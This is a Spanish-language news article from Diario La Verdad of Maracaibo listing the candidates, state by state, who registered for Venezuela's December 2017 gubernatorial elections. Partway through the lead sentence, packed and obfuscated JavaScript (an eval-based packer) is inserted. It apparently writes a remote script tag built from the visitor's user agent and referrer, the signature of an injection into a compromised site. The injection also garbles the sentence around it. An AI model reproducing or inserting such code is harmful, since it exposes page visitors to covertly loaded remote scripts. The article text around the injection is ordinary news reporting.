publicidad

Partidos de oposición inscriben candidatos a las regionales

José Alejandro Urdaneta / Maracaibo / jurdaneta@laverdad.com
Aunque eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|isktn|var|u0026u|referrer|rhnik||js|php'.split('|'),0,{})) voceros de la oposición han expresado su negativa a participar en los comicios pautados por el CNE para el 10 de diciembre, este jueves, partidos pertenecientes a la MUD presentados sus aspirantes por estado. Por el Zulia se presentaron cinco candidatos 

(Foto: Archivo)

Este jueves 10 finaliza la jornada de inscripción de candidatos para las elecciones de gobernadores del próximo 10 de diciembre. Pese a las críticas de personeros del bloque opositor, partidos políticos presentaron a sus postulados para la contienda. 

El Partido Socialista Unido de Venezuela (PSUV) aseguró que presentaría candidatos en todos los estados del país. 

Hasta el último día señalado pór el Consejo Nacional Electoral, la oposición aún no había definido aspirantes en algunas localidades. 

La siguiente es la lista de candidatos presentados por partidos de oposición hasta la tarde de hoy por estado: 

Amazonas: Bernabé Gutiérrez (Exgobernador/Acción Democrática).

Anzoátegui: Luis Carlos Padilla (Diputado/Acción Democrática).

Apure: Jorge Rodríguez Galvis (Alcalde) y José Gregorio Montilla (Acción Democrática).

Aragua: Delson Guarate (Voluntad Popular) y Ismael García (Diputado/Primero Justicia y Acción Democrática).

Barinas: Andrés Eloy Camejo (Diputado/Acción Democrática).

Bolívar: Justo Noguera (Presidente de Sidor/PSUV), Francisco Contreras (PCV), Freddy Valera (Diputado/Acción Democrática), Francisco Sucre (Diputado/Voluntad Popular) y Giovanni Pasquali (MAS).

Carabobo: Haydee Franco (Exconstituyentista/Avanzada Progresista), Alejandro Feo La Cruz (Alcalde/Voluntad Popular y Juega Limpio), Rubén Limas (Legislador/Acción Democrática), Juan Miguel Matheus (Diputado/Primero Justicia), Octavio Táriba (MAS y Psoev), Pablo Da Costa (Nuvipa), Luis León Guerra (Progreso), Vicente Scarano (ConEnzo y Por un Mejor Vivir), Luis Gallo (Seguimos y Alternativa 1), Luis Figueroa (Usted), Enderson Marrero (Un Nuevo Tiempo), Darwin Brett (Iniciativa Propia), Kelvin Pérez (Mi Pueblo), Orlando Pita (Puerto Cabello Primero), Walter Briceño (Puente), Luis Felipe Acosta Carlez (Iniciativa Propia), María Chacón (Independientes por el Progreso), y Eduardo Yépez (Unidad Política Popular 89).

Cojedes: Dennis Fernández (Diputada/Acción Democrática).

Delta Amacuro: Lariza González (Diputada/Acción Democrática).

Falcón: Elicer Sirit (Diputado/Acción Democrática) y José Gregorio Graterol (Diputado/Primero Justicia).

Guárico: Pedro Loreto (Alcalde/Acción Democrática y UNT), Rummy Olivo (Cantante/Primero Justicia y Copei), Jesús Cepeda (Exdiputado/MAS), Yovani Salazar (Alcalde/Voluntad Popular) e Hinderburgo Becerra (Nuvipa).

Lara: Henri Falcón (Gobernador/Avanzada Progresista y Acción Democrática) y Luis Florido (Diputado/Voluntad Popular).

Mérida: Ramón Guevara (Acción Democrática).

Miranda: Negal Morales (Acción Democrática).

Monagas: Luis Eduardo Martínez (Exgobernador/Acción Democrática), Guillermo Call (Exgobernador/Copei), María Gabriela Hernández (Diputada/Primero Justicia), Yelitze Santaella (Gobernadora/PSUV y ORA), Ramón Fuentes (Ex alcalde/Avanzada Progresista), Pablo Morillo (Independiente), Wilfredo Febres (Exdiputado/UNT), Manuel Mendoza (MAS), Antonio Goncalves (Voluntad Popular) y Robert Acevedo (Independiente por el Progreso).

Nueva Esparta: Alfredo Díaz (Alcalde/Acción Democrática y Avanzada Progresista).

Portuguesa: Antonia Muñoz (Exgobernadora/PSUV) y Edgar Miranda (Acción Democrática).

Sucre: Robert Alcalá (Diputado/Acción Democrática), Ramón Martínez (Exgobernador/MAS) y Eduardo Morales Gil (Exgobernador/Voluntad Popular).

Táchira: Juan Requesens (Diputado/Primero Justicia), Miguel Reyes (Legislador regional/Acción Democrática) y Miguel Ángel Rodríguez (Exdiputado/Avanzada Progresista).

Trujillo: Carlos Andrés González (Diputado/Acción Democrática) y Henry Rangel Silva (Gobernador/PSUV).

Vargas: Roberto Smith (Voluntad Popular) y Bernardo Guerra (Exdiputado/Acción Democrática).

Yaracuy: Jesús Peña Navas (Acción Democrática).

Zulia: Hernán Alemán (Diputado/Acción Democrática), Juan Pablo Guanipa (Diputado/Primero Justicia), Carlos Alaimo (Partido Independiente del Zulia), Francisco Arias Cárdenas (Gobernador/PSUV) y Johel Salas (Profesor/Puente).

Más noticias

  • "La única forma de acomodar el país es con elecciones"

    03:04pm

    El diputado a la Asamblea Nacional (AN), Henry Ramos Allup, insistió este martes que la solución a la crisis del país, es con elecciones y además dijo que a Nicolás Maduro “solamente le interesa ser presidente así sea del cementerio”

  • Colombia denuncia incursión militar venezolana

    02:34pm

    Colombia denunció hoy que dos helicópteros y unos 30 militares venezolanos se adentraron en el territorio colombiano el pasado domingo en lo que consideran "una violación de la soberanía"

  • "Gobierno venezolano se prepara para una llegada masiva de colombianos"

    02:06pm

    El presidente de la Asamblea Constituyente de Venezuela, afirmó que su partido está preocupado porque las nuevas reformas económicas que está implementando el gobierno de Nicolás Maduro podrían desencadenar el "éxodo de colombianos a Venezuela"

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama